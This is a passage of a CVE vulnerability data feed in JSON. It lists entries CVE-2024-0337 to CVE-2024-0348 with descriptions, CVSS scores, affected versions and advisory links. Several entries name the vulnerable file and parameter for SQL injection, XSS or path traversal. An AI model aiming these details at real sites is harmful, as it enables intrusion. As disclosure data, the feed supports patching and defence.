"2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0337", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-601" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/", "name" : "https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/", "name" : "https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Travelpayouts: All Travel Brands in One Place WordPress plugin through 1.1.15 is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:travelpayouts:travelpayouts:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.1.17", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-20T05:15Z", "lastModifiedDate" : "2025-05-05T18:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0338", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A buffer overflow vulnerability has been found in XAMPP affecting version 8.2.4 and earlier. An attacker could execute arbitrary code through a long file debug argument that controls the Structured Exception Handler (SEH)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:apachefriends:xampp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "8.2.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-02T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0339", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0340", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:3627", "name" : "RHSA-2024:3627", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:9315", "name" : "RHSA-2024:9315", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:7526", "name" : "RHSA-2025:7526", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3618", "name" : "RHSA-2024:3618", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0340", "name" : "https://access.redhat.com/security/cve/CVE-2024-0340", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257406", "name" : "RHBZ#2257406", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/", "name" : "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3618", "name" : "RHSA-2024:3618", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/", "name" : "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257406", "name" : "RHBZ#2257406", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3627", "name" : "RHSA-2024:3627", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0340", "name" : "https://access.redhat.com/security/cve/CVE-2024-0340", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc3:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-09T18:15Z", "lastModifiedDate" : "2025-05-14T04:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0341", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/VYx8H9u8gyHw", "name" : "https://note.zhaoj.in/share/VYx8H9u8gyHw", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/VYx8H9u8gyHw", "name" : "https://note.zhaoj.in/share/VYx8H9u8gyHw", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250109", "name" : "https://vuldb.com/?ctiid.250109", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250109", "name" : "https://vuldb.com/?ctiid.250109", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250109", "name" : "https://vuldb.com/?id.250109", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250109", "name" : "https://vuldb.com/?id.250109", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Inis up to 2.0.1. It has been rated as problematic. This issue affects some unknown processing of the file /app/api/controller/default/File.php of the component GET Request Handler. The manipulation of the argument path leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The identifier VDB-250109 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inis_project:inis:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-09T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0342", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/nWYJHrmUqv7i", "name" : "https://note.zhaoj.in/share/nWYJHrmUqv7i", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/nWYJHrmUqv7i", "name" : "https://note.zhaoj.in/share/nWYJHrmUqv7i", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250110", "name" : "https://vuldb.com/?ctiid.250110", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250110", "name" : "https://vuldb.com/?ctiid.250110", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250110", "name" : "https://vuldb.com/?id.250110", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250110", "name" : "https://vuldb.com/?id.250110", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Inis up to 2.0.1. Affected is an unknown function of the file /app/api/controller/default/Sqlite.php. The manipulation of the argument sql leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250110 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inis_project:inis:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0343", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing", "name" : "https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing", "name" : "https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250111", "name" : "https://vuldb.com/?ctiid.250111", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250111", "name" : "https://vuldb.com/?ctiid.250111", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250111", "name" : "https://vuldb.com/?id.250111", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250111", "name" : "https://vuldb.com/?id.250111", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in CodeAstro Simple House Rental System 5.6. Affected by this vulnerability is an unknown functionality of the component Login Panel. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250111." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:simple_house_rental_system_project:simple_house_rental_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-09T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0344", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/VSutvlpgCJkD", "name" : "https://note.zhaoj.in/share/VSutvlpgCJkD", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/VSutvlpgCJkD", "name" : "https://note.zhaoj.in/share/VSutvlpgCJkD", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250112", "name" : "https://vuldb.com/?ctiid.250112", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250112", "name" : "https://vuldb.com/?ctiid.250112", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250112", "name" : "https://vuldb.com/?id.250112", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250112", "name" : "https://vuldb.com/?id.250112", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in soxft TimeMail up to 1.1. Affected by this issue is some unknown functionality of the file check.php. The manipulation of the argument c leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250112." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:soxft:timemail:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0345", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing", "name" : "https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing", "name" : "https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250113", "name" : "https://vuldb.com/?ctiid.250113", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250113", "name" : "https://vuldb.com/?ctiid.250113", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250113", "name" : "https://vuldb.com/?id.250113", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250113", "name" : "https://vuldb.com/?id.250113", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in CodeAstro Vehicle Booking System 1.0. This affects an unknown part of the file usr/usr-register.php of the component User Registration. The manipulation of the argument Full_Name/Last_Name/Address with the input leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250113 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vehicle_booking_system_project:vehicle_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-09T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0346", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing", "name" : "https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing", "name" : "https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250114", "name" : "https://vuldb.com/?ctiid.250114", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250114", "name" : "https://vuldb.com/?ctiid.250114", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250114", "name" : "https://vuldb.com/?id.250114", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250114", "name" : "https://vuldb.com/?id.250114", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vehicle_booking_system_project:vehicle_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-09T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0347", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0", "name" : "https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0", "name" : "https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250115", "name" : "https://vuldb.com/?ctiid.250115", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250115", "name" : "https://vuldb.com/?ctiid.250115", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250115", "name" : "https://vuldb.com/?id.250115", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250115", "name" : "https://vuldb.com/?id.250115", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.7, "baseSeverity" : "LOW" }, "exploitabilityScore" : 2.2, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-09T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0348", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4", "name" : "https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4", "name" : "https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250116", "name" : "https://vuldb.com/?ctiid.250116", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250116", "name" : "https://vuldb.com/?ctiid.250116", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250116", "name" : "https://vuldb.com/?id.250116", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250116", "name" : "https://vuldb.com/?id.250116", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as problematic. 